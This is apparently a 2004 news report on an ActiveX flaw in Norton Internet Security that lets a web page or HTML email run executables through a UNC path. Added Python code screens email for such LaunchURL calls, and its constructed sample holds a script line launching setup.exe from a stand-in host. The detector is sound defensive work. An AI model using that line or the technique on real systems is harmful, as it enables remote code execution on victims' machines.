Vulnerability Found in Norton Internet Security
March 26, 2004
One of the software components of Norton Internet Security could allow hackers to use the application as a backdoor into a computer. The flaw occurs in an ActiveX component used by Norton Internet Security, according to NGSSoftware, a security research company. The flaw could be used to run an attack program that would then take control of the computer that the software was intended to protect.
"Installed with Norton Internet Security and Professional is an ActiveX component that is marked safe for scripting, namely WrapNISUM Class. Using the LaunchURL method an attacker has the ability to force the browser to run arbitrary executables on the target. In a real world attack, this would more than likely take the form of a UNC path. It's important to note here that on those Windows operating systems that support the WEBDAV redirector file system if the UNC path cannot be reached over TCP port 139 or 445 it will switch to TCP Port 80 (http). Needless to say this aspect will allow attacks to go through corporate firewalls. The attack can be achieved either by encouraging the 'victim' to visit a malicious web page or placing a script within the content of an (html) email," the advisory stated.
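The delivery route the advisory describes, a script in HTML email calling LaunchURL with a UNC path, can be screened for at a mail gateway. The Python below is an added example, not code from NGSSoftware or Symantec; the function names, the variable name `ctl` and the sample message are constructed for illustration.

```python
import re
from email import message_from_string

# A script call to LaunchURL and its quoted argument. The parenthesis is
# optional because VBScript allows `obj.LaunchURL "target"`.
CALL = re.compile(r"""\.LaunchURL\s*\(?\s*(["'])(.*?)\1""", re.I | re.S)
# UNC target, raw (\\host\share) or JavaScript-escaped (\\\\host\\share).
UNC = re.compile(r"^(?:\\\\){1,2}([^\\/\s]+)\\")

# Constructed sample message; host, path and variable name are made up.
SAMPLE = (
    "From: sender@example.com\n"
    "Subject: constructed sample\n"
    "MIME-Version: 1.0\n"
    "Content-Type: text/html; charset=us-ascii\n"
    "\n"
    "<html><body><script>\n"
    r'ctl.LaunchURL("\\\\files.example.net\\share\\setup.exe");' "\n"
    "</script></body></html>\n"
)

def html_parts(raw_message):
    """Yield the decoded text/html parts of an RFC 822 message string."""
    for part in message_from_string(raw_message).walk():
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True) or b""
            yield body.decode(part.get_content_charset() or "utf-8", "replace")

def find_launchurl_calls(raw_message):
    """Return one finding per LaunchURL call found in HTML parts.

    unc_host is set when the target is a UNC path. The host is reported even
    if SMB (TCP 139/445) is blocked outbound, because the advisory notes the
    WebDAV redirector retries the same path over TCP port 80.
    """
    findings = []
    for html in html_parts(raw_message):
        for call in CALL.finditer(html):
            target = call.group(2)
            unc = UNC.match(target)
            findings.append({"target": target,
                             "unc_host": unc.group(1) if unc else None})
    return findings

if __name__ == "__main__":
    for finding in find_launchurl_calls(SAMPLE):
        print(finding)
```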
Symantec's Antispam software also has the same issue, caused by another ActiveX component.
Symantec released fixes for the flaws that are available at its site, through LiveUpdate, the standard update mechanism included with the programs.
"To date, Symantec has not had any reports of any related exploits, and exploit code has not been posted, but we will continue to evaluate this issue," the company said in a statement sent to CNET News.com. "Symantec issued a fix on March 18 for customers to download via LiveUpdate."
Last December, Symantec fixed a problem that affected a small number of Norton Antivirus 2004, Norton Internet Security 2004, Norton Antispam 2004 and Norton SystemWorks 2004 users. For those customers, the applications would mistakenly ask for a product activation code every time a PC was rebooted, and eventually the program would become locked.